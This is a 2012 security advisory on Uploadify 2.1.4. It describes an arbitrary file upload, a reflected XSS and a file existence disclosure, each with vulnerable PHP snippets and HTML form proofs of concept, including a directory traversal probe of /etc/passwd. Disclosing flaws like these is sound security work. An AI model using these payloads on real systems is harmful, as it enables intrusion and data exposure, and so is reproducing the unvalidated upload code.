Author: Janek Vind "waraxe"
Date: 05. April 2012
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-83.html
Description of vulnerable software:
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Uploadify is a jQuery plugin that integrates a fully-customizable multiple file
upload utility on your website. It uses a mixture of Javascript, ActionScript,
and any server-side language to dynamically create an instance over any DOM
element on a page.
http://www.uploadify.com/
Vulnerable versions
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Affected is Uploadify version 2.1.4.
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1. Arbitrary File Upload vulnerability in "uploadify.php"
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Reason: missing input data validation
Attack vector: user submitted GET or POST parameter 'folder'
Preconditions: none
Result: attacker can upload any files to remote system
Source code snippet from script "check.php":
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if (!empty($_FILES)) {
$tempFile = $_FILES['Filedata']['tmp_name'];
$targetPath = $_SERVER['DOCUMENT_ROOT'] . $_REQUEST['folder'] . '/';
$targetFile = str_replace('//','/',$targetPath) . $_FILES['Filedata']['name'];
move_uploaded_file($tempFile,$targetFile);
echo str_replace($_SERVER['DOCUMENT_ROOT'],'',$targetFile);
}
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We can see, that user submitted parameter 'folder' is used in argument
for php function "move_uploaded_file()". There is no input data validation,
therefore attacker can use directory traversal and upload files with any
extension to arbitrary directory on remote system.
Test:
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<html><body><center>
<form action="http://localhost/uploadify-v2.1.4/uploadify.php"
method="post" enctype="multipart/form-data">
<input type="file" name="Filedata">
<input type="hidden" name="folder" value="/../../">
<input type="submit" value="Upload test">
</form>
</center></body></html>
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2. Reflected XSS vulnerability in "uploadify.php"
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Reason: outputting html data without proper encoding
Attack vector: user submitted GET or POST parameter 'folder'
Preconditions: none
Test:
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<html><body><center>
<form action="http://localhost/uploadify-v2.1.4/uploadify.php"
method="post" enctype="multipart/form-data">
<input type="file" name="Filedata">
<input type="hidden" name="folder" value="<script>alert(String.fromCharCode(88,83,83))</script>">
<input type="submit" value="Upload test">
</form>
</center></body></html>
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Result: XSS payload execution can be observed
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3. File Existence Disclosure vulnerability in "check.php"
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Reason: missing input data validation
Attack vector: user submitted POST parameters
Preconditions: none
Result: attacker can reveal existance of files and directories on remote system
Source code snippet from script "check.php":
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$fileArray = array();
foreach ($_POST as $key => $value) {
if ($key != 'folder') {
if (file_exists($_SERVER['DOCUMENT_ROOT'] . $_POST['folder'] . '/' . $value)) {
$fileArray[$key] = $value;
}
}
}
echo json_encode($fileArray);
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We can see, that user submitted POST parameters are used in argument
for php function "file_exists()". There is no input data validation, therefore
attacker can use directory traversal and reveal existence of arbitrary files
and directories on affected system.
Test:
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<html><body><center>
<form action="http://localhost/uploadify-v2.1.4/check.php" method="post">
<input type="hidden" name="folder" value="/../../../../../../../../etc">
<input type="hidden" name="waraxe" value="passwd">
<input type="submit" value="Test">
</form>
</center></body></html>
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Result: {"waraxe":"passwd"}
Contact:
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come2waraxe@yahoo.com
Janek Vind "waraxe"
Waraxe forum: http://www.waraxe.us/forums.html
Personal homepage: http://www.janekvind.com/
Random project: http://albumnow.com/
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Published on: 2012-04-05 (12854 reads)
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